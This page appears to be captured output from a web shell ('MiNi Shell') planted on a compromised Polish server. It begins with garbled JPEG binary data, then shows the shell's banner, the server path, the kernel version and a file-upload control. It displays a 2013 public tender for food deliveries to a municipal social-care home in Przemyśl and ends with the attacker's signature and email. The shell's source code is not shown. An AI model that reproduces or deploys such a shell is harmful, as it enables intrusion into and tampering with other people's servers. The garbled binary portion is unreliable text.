JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130607/220450-N-2013.html

<p class="kh_header"><b>Przemyśl: Dostawy artykułów spożywczych do Miejskiego Domu Pomocy Społecznej w Przemyślu</b><br>
<b>Numer ogłoszenia: 220450 - 2013; data zamieszczenia: 07.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Dom Pomocy Społecznej , Ul. Gen. J. Wysockiego 99, 37-700 Przemyśl, woj. podkarpackie, tel. 16 670 55 57, faks 16 670 55 57.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mdps.przemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych do Miejskiego Domu Pomocy Społecznej w Przemyślu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie obejmuje dostawę następujących produktów: 
I.	 Różne artykuły spożywcze - 13 670 kg
II.	 Warzywa i owoce - 13 419 kg
III.	 Ryby konserwowe i mrożone - 445 kg
IV.	 Mięso i wędliny - 3984 kg
V.	 Pieczywo - 11370 szt.
VI.	 Warzywa i owoce mrożone - 460 kg
VII.	 Jaja - 8000 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> BRAK</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony formularz oferty, wg załącznika nr 1 do siwz
2. kosztorys ofertowy
3. wypełniony formularz o zakresie prac wykonywanych przez podwykonawców              (jeżeli dotyczy)
4. pełnomocnictwo (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a. urzędowa zmiana stawki podatku VAT - w celu dostosowania do aktualnie 
	obowiązującej stawki - bez zmiany wartości netto produktów objętych zmianą 
	jednak nie wcześniej niż po dacie rozpoczęcia jej obowiązywania. Zmiana umowy 
    w tym zakresie może być wprowadzona tylko na wniosek Wykonawcy. Jednocześnie 
	Wykonawca zobowiązuje się do przedstawienia Zamawiającemu podstawy prawnej 
	do podwyższenia lub obniżenia cen towarów np. rozporządzenie, obwieszczenie, 
	ustawa lub innej podstawy do zmiany cen - zmiany umowy. 
b. w przypadku zmiany powyżej 3% kwartalnego wskaźnika cen towarów i usług 
	podawanego przez GUS, publikowanego w Monitorze Polskim, - o wielkość tegoż 
	wskaźnika, jednak nie wcześniej niż po jego ogłoszeniu. Zmiana umowy w tym 
	zakresie może być wprowadzona tylko na wniosek Wykonawcy. Jednocześnie 
	Wykonawca zobowiązuje się do przedstawienia Zamawiającemu podstawy do 
	podwyższenia lub obniżenia cen towarów np. rozporządzenie, obwieszczenie, 
	ustawa lub innej podstawy prawnej do zmiany cen. 
c. w przypadku zmian przepisów ogólnie obowiązujących, które miałyby wpływ na 
	treść umowy. 
d. w przypadku obniżenia cen producenta lub zastosowania promocyjnej obniżki cen, 
	Zamawiający zastrzega sobie prawo zakupu asortymentu objętego umową po 
	cenach odpowiednio obniżonych. 
e. w przypadku podwyższenia jakości parametrów lub innych cech 
	charakterystycznych dla przedmiotu dostawy, w tym zmiana numeru katalogowego 
	produktu lub nazwy własnej produktu pod warunkiem wprowadzenia na rynek 
	produktu o wyższej jakości, lepszych parametrach lub innych korzystniejszych 
	cechach charakterystycznych, przy zachowaniu ceny ofertowej dla danego 
	produktu, na podstawie pisemnego wniosku Wykonawcy, pod warunkiem 
	uzyskania zgody przez Zamawiającego. 
f. w przypadku zmiany sposobu konfekcjonowania towarów objętych umową, 
	 w przypadku zmiany wielkości opakowania wprowadzonej przez producenta 
      z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową, pod 
	 warunkiem uzyskania zgody przez Zamawiającego. 
g. w przypadku wstrzymania lub zakończenia produkcji towarów będących 
	przedmiotem dostawy, możliwość dostarczania odpowiedników towarów objętych 
	umową, o parametrach nie gorszych niż towary objęte ofertą, przy zachowaniu 
	ceny ofertowej dla danego towaru na podstawie pisemnego wniosku Wykonawcy, 
	pod warunkiem uzyskania zgody przez Zamawiającego. 
h. Zmiany umowy wymagają formy pisemnej pod rygorem nieważności i będą 
	dopuszczalne w granicach normowania Ustawy z dnia 29 stycznia 2004r. Prawo 
	zamówień publicznych ( t.j. z 2007 r. Dz. U. Nr 223, poz. 1655 z późn. zm.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> mdps.przemysl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Dom Pomocy Społecznej
ul. Generała Józefa Wysockiego 99
37-700 Przemyśl
budynek Administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2013 godzina 08:45, miejsce: Miejski Dom Pomocy Społecznej
ul. Generała Józefa Wysockiego 99
37-700 Przemyśl
budynek Administracji
pokój sekretariatu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne artykuły Spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budyń bez cukru	szt.	445
Chrzan 0,26 - 0,40kg	kg	26
Ciastka bezcukrowe - Herbatniki 73g	szt.	80
Ciastka bezcukrowe - wafelki z nadzieniem 110g	   szt. 80
Ciastka biszkoptowe	kg	28
Ciastka wafle nadziewane	kg	35
Cukier	kg	1 100
Dżem niskosłodzony	kg	130
Dżem wysokosłodzony	kg	82
Groszek konserwowy 0,40 - 0,50kg	kg	34
Herbata	kg	43
Jogurt naturalny 1L	szt.	600
Jogurt owocowy 1L o zawartości 1.5% tłuszczu	szt.	2 300
Kakao typu holederskiego	kg	9
Kasza gryczana	kg	70
Kasza jęczmienna	kg	65
Kasza manna	kg	90
Kawa zbożowa rozpuszczalna typu inka	kg	10
Kefir 400g	szt.	470
Ketchup 500ml łagodny	szt.	104
Kisiel bez cukru	kg	5
Koncentrat pomidorowy 30%	kg	95
Krem czekoladowy	kg	60
Kukurydza konserwowa 0.40 - 1 kg	kg	20
Kwasek cytrynowy 0.02kg	szt.	170
Majonez 0.60 - 0.80kg	kg	33
Makaron domowy 1 - 3kg	kg	385
Makaron nitka jajeczny 0.50 - 1 kg	kg	26
Margaryna mleczna	kg	83
Margaryna śniadaniowa 0.50kg	kg	192
Marmolada wieloowocowa 1 -1.5kg	kg	121
Masło zawartość tłuszczu 82%	kg	421
Mąka pszenna typ 500%	kg	350
Mąka ziemniaczana	kg	15
Mleko folia 2% tłuszczu	l	3 325
Mleko w proszku 0.5kg 26% tłuszczu	kg	100
Musztarda do 0.5kg	kg	20
Ocet	l	12
Ogórek kiszony 0.9L	kg	60
Ogórek konserwowy 0.9L	kg	106
Olej rzepakowy, sojowy	l	150
Pieczarka marynowana 0.9L	kg	10
Płatki owsiane	kg	114
Powidło śliwkowe do 0.9kg	kg	115
Ryż 1kg	kg	278
Seler marynowany 0.9L	kg	48
Ser topiony 27% tłuszczu kremowy różne smaki	kg	115
Ser twarogowy chudy krajanka	kg	506
Ser twarogowy półtłusty krajanka	kg	303
Ser żółty 45% tłuszczu typu edamski nie gorszy	kg	118
Serek owocowy 125g	szt.	1 000
Serek wiejski ziarnisty 200g	szt.	420
Sól	kg	350
Śmietana 18% tłuszczu do 1L	l	600
Płatki kukurydziane	kg	20
Żurek słoik 0.35 - 0.4kg	kg	43
Żelatyna 20 - 50g	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Buraki	Kg	795
Arbuz	Kg	300
Banany	Kg	200
Brzoskwinie	Kg	150
Cebula	Kg	288
Cebulka zielona - pęczek	szt.	220
Cytryna	Kg	200
Czosnek	Kg	3
Fasola Jaś	Kg	45
Jabłka deserowe	Kg	400
Jabłka kompotowe	Kg	600
Kapusta biała	Kg	219
Kapusta czerwona	Kg	34
Kapusta kiszona	Kg	50
Kapusta pekińska	Kg	132
Mandarynka	Kg	100
Marchew	Kg	1390
Ogórek świeży	Kg	70
Pieczarka - swieża	Kg	23
Pietruszka korzeń	Kg	205
Pietruszka natka - pęczek	szt.	220
Pomarańcze	Kg	100
Pomidory	Kg	390
Por	Kg	115
Rzodkiewka - pęczek	szt.	300
Sałata zielona	szt.	400
Seler korzeń	Kg	223
Szczypior - pęczek	szt.	20
Ziemniaki	Kg	7 150
Koper zielony pęczek	szt.	220
Kalafior świeży oczyszczony	kg	150
Fasola szparagowa	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ryby konserwowe i mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet Dorsz mrożony	kg	185
Filet Mintaj SHP	kg	30
Konserwa Makrela, filet w pomidorach	kg	40
Konserwa Makrela, filet w oleju	kg	56
Filet śledziowy w oleju	kg	36
Makrela wędzona	kg	36
Konserwa paprykarz szczeciński	kg	14
Konserwa sałatka z makreli	kg	14
Tuńczyk w kawałkach w oleju	kg	12
Szprot w pomidorach	kg	12
Filet śledziowy marynowany	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Antrykot	kg	100
Baleron	kg	38
Boczek gotowany	kg	10
Ćwiartka kurczaka	kg	24
Filet z indyka bez kości	kg	100
Filet z kurczaka bez kości	kg	200
Flaki wołowe	kg	43
Karczek bez kości	kg	57
Kiełbasa krakowska parzona	kg	40
Kiełbasa mortadela	kg	95
Kiełbasa parówkowa (zawartość mięsa nie mniejsza niż 60%)	kg	200
Kiełbasa szynkowa (zawartość mięsa nie mniejsza niż 60%)	kg	125
Kiełbasa wiejska (zawartość mięsa nie mniejsza niż 60%)	kg	10
Kiełbasa zwyczajna (zawartość mięsa nie mniejsza niż 60%)	kg	88
Kiszka (krupniak)	kg	40
Konserwa pasztet drobiowy	szt.	320
Kości	kg	335
Kurczak świeży	kg	430
Lencz	kg	18
Łopatka WP bez kości	kg	215
Mięso gulaszowe z indyka	kg	230
Noga z kurczaka	kg	435
Parówki drobiowe (zawartość mięsa nie mniejsza niż 60%)	kg	120
Parówki wieprzowe (zawartość mięsa nie mniejsza niż 60%)	kg	17
Pasztet pieczony (zawartość mięsa nie mniejsza niż 60%)	kg	14
Pasztetowa	kg	50
Polędwica sopocka WP	kg	106
Porcja rosołowa	kg	32
Salceson drobiowy	kg	86
Salceson WP	kg	10
Schab bez kości	kg	185
Słonina	kg	6
Smalec	kg	16
Szynka drobiowa (zawartość mięsa nie mniejsza niż 60%)	kg	160
Szynka pieczona	kg	70
Szynka wiejska gotowana	kg	90
Szynka wieprzowa	kg	44
Wątroba	kg	25
Wątroba z drobiu	kg	40
Żeberka paski	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bina	szt.	2110
Bułka tarta	Kg	40
Bułka zwykła	szt.	610
Chleb razowy	szt.	2230
Chleb wiejski	szt.	4000
Drożdżówka z kruszonką	szt.	1050
Drożdżówka z nadzieniem	szt.	1370.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Warzywa i owoce mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuły mrożone	kg	30
Fasola szparagowa mrożona	kg	20
Jarzynka mrożona	kg	150
Kalafior mrożony	kg	150
Marchew mrożona	kg	50
Mieszanka kompotowa	kg	160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jajo świeże średnie	szt.	8000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com